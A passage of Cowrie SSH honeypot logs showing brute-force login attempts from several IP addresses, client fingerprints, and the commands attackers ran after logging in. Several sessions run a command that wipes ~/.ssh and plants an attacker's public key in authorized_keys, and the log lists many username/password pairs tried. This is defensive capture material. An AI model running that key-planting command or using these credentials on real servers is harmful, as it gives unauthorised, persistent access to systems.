es256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:02:12.672405Z","src_ip":"212.227.235.229","session":"73a958f521cc"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:13.145778Z","src_ip":"212.227.235.229","session":"c89972db79ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:14.722646Z","src_ip":"212.227.125.160","session":"e36fa9bc1216"}
{"eventid":"cowrie.session.closed","duration":180.11629056930542,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:14.727729Z","src_ip":"212.227.125.160","session":"e36fa9bc1216"}
{"eventid":"cowrie.login.success","username":"root","password":"fckgw0508","message":"login attempt [root/fckgw0508] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:16.962356Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40130,"dst_ip":"1.2.3.4","dst_port":22,"session":"7330eb1022fa","protocol":"ssh","message":"New connection: 212.227.235.229:40130 (1.2.3.4:22) [session: 7330eb1022fa]","sensor":"my-vps","timestamp":"2025-08-31T06:02:18.140900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:18.141640Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.login.failed","username":"test3","password":"admin123","message":"login attempt [test3/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:18.373072Z","src_ip":"212.227.235.229","session":"73a958f521cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:18.400166Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.login.success","username":"root","password":"aaAA11!!","message":"login attempt [root/aaAA11!!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:19.465625Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:20.446654Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.447399Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.448450Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:20.468227Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.469100Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51462,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cc149268be8","protocol":"ssh","message":"New connection: 212.227.125.160:51462 (1.2.3.4:22) [session: 2cc149268be8]","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.470509Z"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.471459Z","src_ip":"212.227.235.229","session":"73a958f521cc"}
{"eventid":"cowrie.session.closed","duration":"39.8","message":"Connection lost after 39.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.472256Z","src_ip":"212.227.235.229","session":"c89972db79ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:20.707346Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:21.238785Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.239655Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.497614Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.498583Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43098,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ddf471cfb77","protocol":"ssh","message":"New connection: 212.227.235.229:43098 (1.2.3.4:22) [session: 1ddf471cfb77]","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.752263Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41316,"dst_ip":"1.2.3.4","dst_port":22,"session":"66e46555fd3c","protocol":"ssh","message":"New connection: 212.227.235.229:41316 (1.2.3.4:22) [session: 66e46555fd3c]","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.753421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.754138Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.754886Z","src_ip":"212.227.235.229","session":"66e46555fd3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.885017Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:21.886239Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:22.012519Z","src_ip":"212.227.235.229","session":"66e46555fd3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:22.033768Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:23.082407Z","src_ip":"212.227.235.229","session":"66e46555fd3c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd0!","message":"login attempt [root/P@ssw0rd0!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:23.187218Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:23.765198Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:23.765889Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:23.767116Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.046625Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.342460Z","src_ip":"212.227.235.229","session":"66e46555fd3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42174,"dst_ip":"1.2.3.4","dst_port":22,"session":"9334e4f772f5","protocol":"ssh","message":"New connection: 212.227.235.229:42174 (1.2.3.4:22) [session: 9334e4f772f5]","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.597246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.598806Z","src_ip":"212.227.235.229","session":"9334e4f772f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:24.660419Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.661066Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.856090Z","src_ip":"212.227.235.229","session":"9334e4f772f5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.941084Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:24.942061Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43100,"dst_ip":"1.2.3.4","dst_port":22,"session":"b455395858f4","protocol":"ssh","message":"New connection: 212.227.235.229:43100 (1.2.3.4:22) [session: b455395858f4]","sensor":"my-vps","timestamp":"2025-08-31T06:02:25.209944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:25.210775Z","src_ip":"212.227.235.229","session":"b455395858f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:25.480446Z","src_ip":"212.227.235.229","session":"b455395858f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:25.884755Z","src_ip":"212.227.235.229","session":"9334e4f772f5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:26.143517Z","src_ip":"212.227.235.229","session":"7330eb1022fa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:26.144717Z","src_ip":"212.227.235.229","session":"9334e4f772f5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:26.600104Z","src_ip":"212.227.235.229","session":"b455395858f4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:27.871695Z","src_ip":"212.227.235.229","session":"b455395858f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43104,"dst_ip":"1.2.3.4","dst_port":22,"session":"61f4d1bd3794","protocol":"ssh","message":"New connection: 212.227.235.229:43104 (1.2.3.4:22) [session: 61f4d1bd3794]","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.149118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.150018Z","src_ip":"212.227.235.229","session":"61f4d1bd3794"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33372,"dst_ip":"1.2.3.4","dst_port":22,"session":"f636d091a780","protocol":"ssh","message":"New connection: 212.227.235.229:33372 (1.2.3.4:22) [session: f636d091a780]","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.318965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.319766Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 